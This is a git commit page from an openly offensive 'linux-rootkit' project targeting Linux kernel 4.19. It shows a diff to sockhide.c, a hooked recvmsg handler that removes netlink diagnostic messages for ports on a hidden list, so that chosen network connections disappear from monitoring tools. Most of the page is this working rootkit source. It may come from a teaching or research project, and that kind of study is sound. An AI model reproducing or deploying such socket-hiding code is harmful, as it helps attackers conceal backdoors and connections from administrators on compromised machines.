linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit bb9029d71dbd4fa5632e7a711f0281febeab1dfd
parent d1bafd4403cdd1befcd19458c7265cfb187ebb87
Author: deurzen <m.deurzen@tum.de>
Date:   Sun, 13 Dec 2020 04:49:00 +0100

refactors code

Diffstat:

Msrc/sockhide.c | 18++++++++----------


1 file changed, 8 insertions(+), 10 deletions(-)

diff --git a/src/sockhide.c b/src/sockhide.c
@@ -178,18 +178,16 @@ g7_recvmsg(struct pt_regs *pt_regs)
         int src = ntohs(((struct inet_diag_msg *)NLMSG_DATA(nh))->id.idiag_sport);
         int dst = ntohs(((struct inet_diag_msg *)NLMSG_DATA(nh))->id.idiag_dport);
 
-        if (!(list_contains_port(&hidden_ports, src, -1)
-            || list_contains_port(&hidden_ports, dst, -1)))
+        if (list_contains_port(&hidden_ports, src, -1)
+            || list_contains_port(&hidden_ports, dst, -1))
         {
-            nh = NLMSG_NEXT(nh, len);
-            continue;
-        }
+            int alignment = NLMSG_ALIGN(nh->nlmsg_len);
+            for (i = 0; i < len; ++i)
+                ((char *)nh)[i] = ((char *)nh)[i + alignment];
 
-        int alignment = NLMSG_ALIGN(nh->nlmsg_len);
-        for (i = 0; i < len; ++i)
-            ((char *)nh)[i] = ((char *)nh)[i + alignment];
-
-        ret -= alignment;
+            ret -= alignment;
+        } else
+            nh = NLMSG_NEXT(nh, len);
     }
 
     return ret;